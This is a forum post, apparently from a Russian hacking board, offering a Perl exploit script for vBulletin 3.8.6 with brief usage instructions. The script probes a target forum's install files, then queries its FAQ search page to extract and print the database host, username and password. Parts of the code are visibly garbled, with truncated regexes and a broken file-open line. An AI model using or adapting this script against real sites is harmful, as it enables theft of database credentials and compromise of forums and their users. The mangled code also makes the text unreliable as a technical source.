13.02.2011, 18:32
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
vBulletin 3.8.6 Exploit
Код:
#!/usr/bin/perl
use strict;
use LWP::Simple;
use HTML::Parser;
use Data::Dumper;
my $url = shift @ARGV;
my $line;
die "No URL specified on command line." unless (defined $url);
my $url2 = "$url\/install\/vbulletin-language.xml";
my $content = get($url2); #put site html in $content.
die "get failed" if (!defined $content);
if ($content =~ m/database_ingo/) {
$url2 = "$url\/faq.php\?s=\&do=search\&q=data\&match=all\&titlesonly=0";
$content = get($url2);
die "Get Failed" if (!defined $content);
open(MYDATA, ">aaaaa.txt");
print MYDATA $content;
close MYDATA;
open(NEDATA, ") {
if ($line =~ m/Host:/) {
$line =~ s/Database\//;
$line =~ s/\//;
print "$line\n";
}
if ($line =~ m/Username:/) {
$line =~ s/Database//;
$line =~ s///;
print "$line\n";
}
if ($line =~ m/Password:/) {
$line =~ s/Database//;
$line =~ s///;
print "$line\n";
}
}
close NEDATA;
unlink($url2);
} else {
print "Not vulnerable!\n";
};
_____________________________________________
How to use?
my $content = get($url2)
my $content = get('http://wowcewebsite.com/path/')
_____________________________________________*
|
|
|